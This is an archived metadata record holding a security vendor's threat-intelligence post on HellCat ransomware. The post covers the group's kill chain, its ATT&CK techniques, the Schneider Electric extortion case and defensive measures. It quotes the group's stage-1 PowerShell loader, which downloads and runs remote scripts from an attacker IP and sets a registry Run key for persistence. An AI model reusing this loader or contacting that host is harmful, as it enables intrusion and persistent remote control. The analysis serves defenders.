{
	"id": "2fb154a2-575e-4bd1-894e-f54ea0c1fab5",
	"created_at": "2026-04-06T00:21:23.585848Z",
	"updated_at": "2026-04-10T03:23:40.385105Z",
	"deleted_at": null,
	"sha1_hash": "0d230dcdf198c2c92d5f39f24ef9d496bc20252d",
	"title": "HellCat Ransomware: Exposing the TTPs of a Rising Ransomware Threat in 2025",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 272047,
	"plain_text": "HellCat Ransomware: Exposing the TTPs of a Rising Ransomware\r\nThreat in 2025\r\nBy Sıla Özeren Hacıoğlu\r\nPublished: 2025-03-13 · Archived: 2026-04-05 17:31:33 UTC\r\nHellCat Ransomware is a prominent ransomware group that emerged in mid-2024, specializing in targeted cyber\r\nextortion and data exfiltration operations. The group primarily leverages sophisticated phishing tactics, often\r\ndistributing malicious email attachments and exploiting vulnerabilities in exposed systems to gain initial access.\r\nUpon successful infiltration, HellCat aggressively exfiltrates sensitive data, employing psychological tactics and\r\npublic pressure to compel victims into paying ransoms. The group's operations frequently overlap with the\r\nMorpheus ransomware, indicating possible shared tooling or affiliate relationships.\r\nIn this analysis, we examine the tactics, techniques, and procedures (TTPs) employed by the HellCat ransomware\r\ngroup, providing detailed insights into their methods of compromise, lateral movement, data exfiltration strategies,\r\nand recommended defensive measures to mitigate their threat.\r\nMalware Kill Chain of HellCat Ransomware\r\nBelow is a concise overview of the malware kill chain used by HellCat ransomware [1]. This breakdown details\r\nthe infection's sequential stages—from initial access to command-and-control establishment—showing how each\r\ncomponent evades detection and maintains persistence. \r\nFor more in-depth explanations of the tactics, techniques, and procedures (TTPs) used by HellCat ransomware,\r\nsee the following section.\r\nStage 1 – Initial Access\r\nS1.ps1: This initiating PowerShell script masquerades as an executable and establishes persistence by\r\nadding a registry key. It then connects to a malicious open directory to download subsequent payloads.\r\nFigure 1: Virus Total Analysis for S1.ps1.\r\nStage 2 – Secondary Payloads\r\nPayload.ps1: Once downloaded by S1.ps1, it serves as the conduit to fetch further scripts.\r\nhttps://www.picussecurity.com/resource/blog/hellcat-ransomware\r\nPage 1 of 7\n\nIsma.ps1: Executed alongside Payload.ps1, this script bypasses the Antimalware Scan Interface (AMSI) to\r\nhelp evade detection.\r\nStage 3 – Final Script Download\r\nShellcode.ps1: This script is responsible for downloading and executing the final command-and-control\r\npayload directly in memory using reflective code loading.\r\nStage 4 – C2 Establishment\r\nStager.woff: This final payload, a shellcode variant of SliverC2, is executed to establish persistence and\r\ncreate a command-and-control channel on the victim system.\r\nFigure 2. Virus Total Analysis for Stager.woff.\r\nAnalyzing HellCat Ransomware's Advanced Tactics, Techniques, and Procedures\r\n(TTPs)\r\nThis section provides a comprehensive analysis of these TTPs, offering insights into how HellCat Ransomware\r\noperates and the tools they employ.\r\nInitial Access Methods\r\nT1566.001 - Phishing: Spearphishing Attachment\r\nHellcat operators have utilized spearphishing emails with malicious attachments to gain initial access to target\r\nsystems.\r\nT1190 - Exploit Public-Facing Application\r\nThe group employs the Exploit Public-Facing Application technique to target vulnerabilities in exposed systems\r\nlike Atlassian Jira. By leveraging previously unknown zero-day vulnerabilities, they can bypass perimeter\r\ndefenses and gain stealthy remote access and control. [2]. \r\nhttps://www.picussecurity.com/resource/blog/hellcat-ransomware\r\nPage 2 of 7\n\nImage is taken from here.\r\nExecution and Persistence\r\nUpon gaining access, HellCat utilizes sophisticated techniques to execute their payloads and maintain persistence.\r\nT1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nAs stressed earlier, HellCat operators rely on multi-stage PowerShell infection chains to execute their malware\r\nand maintain access on victim systems. These chains often begin with an initial PowerShell script - the stage 1\r\npayload. \r\nThis payload establishes persistence and contacts attacker infrastructure for next-stage payloads.\r\n$pspath = (get-command powershell) .source;\r\n$pspath = '\"' + $pspath + '\" /w 1 /c \"ic -scriptblock $([ScriptBlock]::Create([System. Text.Encoding]:: UTF8\r\ngetString((iwr http://45.200.148.157:8878/payload.ps1). content)))\"*\r\nicm-scriptblock $([ScriptBlock]:: Create([System. Text.Encoding]::UTF8.getString((iwr\r\nhttp://45.200.148.157:8878/payload2.ps1)-content) ))\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v maintenance /t REG_ SZ /d $pspath /f\r\nThis stage 1 payload adds a Windows Registry Run key entry (e.g., under HKCU...\\Run with a value named\r\n“maintenance”) pointing to the malicious script, ensuring it runs each time the user logs in.\r\nOnce launched, the script connects to an open directory controlled by the attackers to download a stage 2 payload\r\nPowerShell payload. \r\nhttps://www.picussecurity.com/resource/blog/hellcat-ransomware\r\nPage 3 of 7\n\nT1620: Reflective Code Loading\r\nHellCat’s infection chain employs reflective code loading techniques to run malicious code in memory and evade\r\nfile-based security controls. \r\nIn later stages of the PowerShell chain, the stage 3 payload downloads a final payload and injects it directly into\r\nmemory rather than writing it to disk. By loading shellcode or DLLs reflectively, HellCat can execute its\r\nransomware or C2 agent without leaving a traditional file trace, thereby evading antivirus file scans. \r\nThe stage 3 payload in HellCat’s chain fetched a shellcode payload (stager.woff), which is a memory-resident\r\nvariant of the SliverC2 backdoor, and executed it within the PowerShell process.\r\n1562.001: Disable or Modify Tools\r\nTo execute its PowerShell-based malware unobstructed, HellCat employs methods to bypass the Antimalware\r\nScan Interface (AMSI), thereby disabling or weakening security tool inspections. Analysis of HellCat’s scripts\r\nshows another stage 2 payload (isma.ps1) dedicated to an AMSI bypass.\r\nThis script alters the AMSI scanning mechanism so that malicious scripts can run without being flagged by\r\nWindows Defender or other AMSI-integrated security solutions. \r\nBy in-memory modifying AMSI’s behavior (a common malware technique), HellCat ensures its subsequent\r\npayloads (like the reflective loader and Sliver backdoor) execute unhindered. In practice, once the AMSI bypass\r\nscript runs, the PowerShell process can load and run heavily obfuscated or malicious code (for example, decoding\r\nand invoking shellcode) without triggering the host’s anti-malware defenses.\r\nCommand-and-Control (C2)\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nDeploying SliverC2 Framework for Command and Control (C2)\r\nHellCat has been observed deploying a complex infection chain that culminates in the memory-resident execution\r\nof Sliver implants. The attack typically begins with the stage 3 PowerShell script designed to download, decrypt,\r\nand execute a Sliver payload. \r\nThis script, often hosted on the group’s own infrastructure, triggers the final stage of the attack. The final payload\r\nincludes the necessary shellcode to inject and initialize the Sliver implant directly within the victim machine’s\r\nmemory space, bypassing traditional detection mechanisms. This memory-based payload execution enables the\r\nattackers to establish a command-and-control channel that remains concealed from many endpoint defenses,\r\nproviding them with persistent access and the ability to remotely manage compromised systems. \r\nPrivilege Escalation and Lateral Movement\r\nAnalyses of HellCat intrusions show that the group relies on “living off the land” binaries—everyday, low-profile\r\ntools—for its operations. Instead of using custom malware, HellCat employs common utilities like Netcat and\r\nhttps://www.picussecurity.com/resource/blog/hellcat-ransomware\r\nPage 4 of 7\n\nNetscan to navigate within networks. \r\nThis approach allows the attackers to discreetly discover internal networks, pivot between systems, and transfer\r\ndata. Since these tools are legitimate and commonly found in many IT environments, they enable the attackers to\r\nblend in and avoid triggering alarms.\r\nBelow, you will find the mapped techniques to MITRE ATT\u0026CK framework of HellCat ransomware regarding\r\nthis section.\r\nT1046: Network Service Discovery: Using tools such as Netscan to map out the network and identify\r\npotential targets for lateral movement.\r\nT1218: Signed Binary Proxy Execution: Using common, trusted binaries (such as Netscan) to execute\r\nmalicious actions, helping them blend into the environment and evade detection.\r\nT1021: Remote Services: Leveraging legitimate remote utilities, like Netcat, to establish communication\r\nchannels and move laterally within the victim’s infrastructure.\r\nT1078: Valid Accounts: Employing credentials (either stolen or default) to authenticate and operate under\r\nthe guise of legitimate users, further aiding stealth and lateral movement.\r\nData Exfiltration and Extortion\r\nHellCat's operations are characterized by:\r\nDouble Extortion Tactics\r\nHellCat’s approach follows a common model in modern ransomware attacks—first, the group infiltrates a target\r\nnetwork to exfiltrate sensitive data (often in bulk) and then encrypts the systems. This two-pronged strategy\r\nincreases pressure on victims since, even if they restore their systems, the stolen data may still be leaked or sold if\r\nthe ransom isn’t paid.\r\nEmploying Attention-Grabbing Demands to Apply Pressure\r\nWhat sets HellCat apart is its deliberate use of attention-grabbing demands to pressure victims. \r\nA widely reported incident involved Schneider Electric, where the attackers not only stole more than 40GB of\r\ncompressed data (including projects, issues, and over 400,000 rows of user information) but also demanded a\r\nransom of $125,000 in “baguettes [3].” This culturally resonant request is designed to heighten public scrutiny and\r\ncause reputational harm to its targets, adding a psychological dimension to their extortion strategy.\r\nRansomware Payload Characteristics\r\nUnaltered File Extensions\r\nWhile some preliminary reports have mentioned that HellCat ransomware might not change file extensions after\r\nencryption, there isn’t broad, corroborated evidence from multiple sources confirming this behavior. This claim\r\nhttps://www.picussecurity.com/resource/blog/hellcat-ransomware\r\nPage 5 of 7\n\nappears to deviate from common ransomware patterns, so further validation from additional threat intelligence\r\nreports would be advisable.\r\nShared Codebase with Other Ransomware\r\nSeveral analyses have noted significant overlaps between HellCat and Morpheus ransomware payloads [4],\r\nsuggesting they may share a common builder or that there is some level of collaboration between affiliates. This\r\nobservation is supported by comparisons in code similarities noted in reputable cybersecurity reports.\r\nHow Does Picus Help Against the HellCat Ransomware as a Service (RaaS)\r\nGroup?\r\nWe strongly suggest simulating ransomware groups to test the effectiveness of your security controls against their\r\nattacks using the Picus Security Validation Platform.  \r\nPicus Threat Library includes the following threats for HellCat Ransomware attacks.\r\nThreat ID Threat Name Attack Module\r\n27847 HellCat Ransomware Download Threat Network Infiltration\r\n91292 HellCat Ransomware Email Threat Email Infiltration\r\nDefense Strategies Against HellCat Ransomware Attacks\r\nTo mitigate the impact of HellCat Ransomware attacks, organizations should adopt a layered defense approach:\r\nDeploy Advanced Endpoint Detection and Response (EDR) Solutions\r\nInvest in robust EDR tools that continuously monitor endpoints for suspicious activities—such as abnormal\r\nPowerShell usage or unexpected script executions—and provide real-time remediation. This early detection can\r\nhelp contain threats before they spread.\r\nContinuously Test and Validate Security Controls\r\nGiven the evolving tactics of HellCat ransomware, organizations must regularly assess the effectiveness of their\r\ndefenses. Use Breach and Attack Simulation (BAS) solutions, such as the Picus Security Control Validation (SCV)\r\nsolution, to emulate real-world attack scenarios—ranging from initial phishing attempts and exploitation of\r\npublic-facing applications to the deployment of malicious PowerShell scripts and command-and-control (C2)\r\ncommunications. These proactive tests help identify control gaps and provide actionable recommendations to\r\nstrengthen your security posture.\r\nhttps://www.picussecurity.com/resource/blog/hellcat-ransomware\r\nPage 6 of 7\n\nImplement Network Segmentation and a Zero Trust Model\r\nSegment your network to limit lateral movement in the event of a breach. Embrace a Zero Trust security model\r\nthat continuously verifies every user and device, ensuring that even if an attacker gains access, the damage is\r\ncontained within a limited segment of your network.\r\nMaintain Regular, Immutable Offline Backups and an Incident Response Plan\r\nEnsure that critical data is backed up regularly and stored offline in an immutable format to prevent tampering\r\nduring an attack. Develop and routinely test an incident response plan that clearly outlines roles, responsibilities,\r\nand procedures for rapid containment, eradication, and recovery in the event of a ransomware incident.\r\nReferences\r\n[1] N. Richards, “Who are Hellcat Ransomware Group?,” Bridewell, Feb. 28, 2025. Available:\r\nhttps://www.bridewell.com/insights/blogs/detail/who-are-hellcat-ransomware-group. [Accessed: Mar. 12, 2025]\r\n[2] J. Lyons, “Baguette bandits strike again with ransomware and a side of mockery,” The Register, Jan. 28, 2025.\r\nAvailable: https://www.theregister.com/2025/01/28/baguettes_bandits_strike_again/. [Accessed: Mar. 10, 2025]\r\n[3] D. Winder, “Ransomware Gang Demands $125,000 Payment In French Bread And Crypto,” Forbes, Nov. 06,\r\n2024. Available: https://www.forbes.com/sites/daveywinder/2024/11/06/ransomware-gang-demands-125000-\r\npayment-in-french-bread-and-crypto/. [Accessed: Mar. 12, 2025]\r\n[4] “HellCat, Morpheus RaaS operations leverage similar payloads,” SC Media, Jan. 24, 2025. Available:\r\nhttps://www.scworld.com/brief/hellcat-morpheus-raas-operations-leverage-similar-payloads. [Accessed: Mar. 12,\r\n2025]\r\nSource: https://www.picussecurity.com/resource/blog/hellcat-ransomware\r\nhttps://www.picussecurity.com/resource/blog/hellcat-ransomware\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.picussecurity.com/resource/blog/hellcat-ransomware"
	],
	"report_names": [
		"hellcat-ransomware"
	],
	"threat_actors": [
		{
			"id": "a602818a-34da-445f-9bac-715cc9b47a3d",
			"created_at": "2025-07-12T02:04:58.190857Z",
			"updated_at": "2026-04-10T02:00:03.850831Z",
			"deleted_at": null,
			"main_name": "GOLD PUMPKIN",
			"aliases": [
				"HellCat"
			],
			"source_name": "Secureworks:GOLD PUMPKIN",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434883,
	"ts_updated_at": 1775791420,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0d230dcdf198c2c92d5f39f24ef9d496bc20252d.pdf",
		"text": "https://archive.orkl.eu/0d230dcdf198c2c92d5f39f24ef9d496bc20252d.txt",
		"img": "https://archive.orkl.eu/0d230dcdf198c2c92d5f39f24ef9d496bc20252d.jpg"
	}
}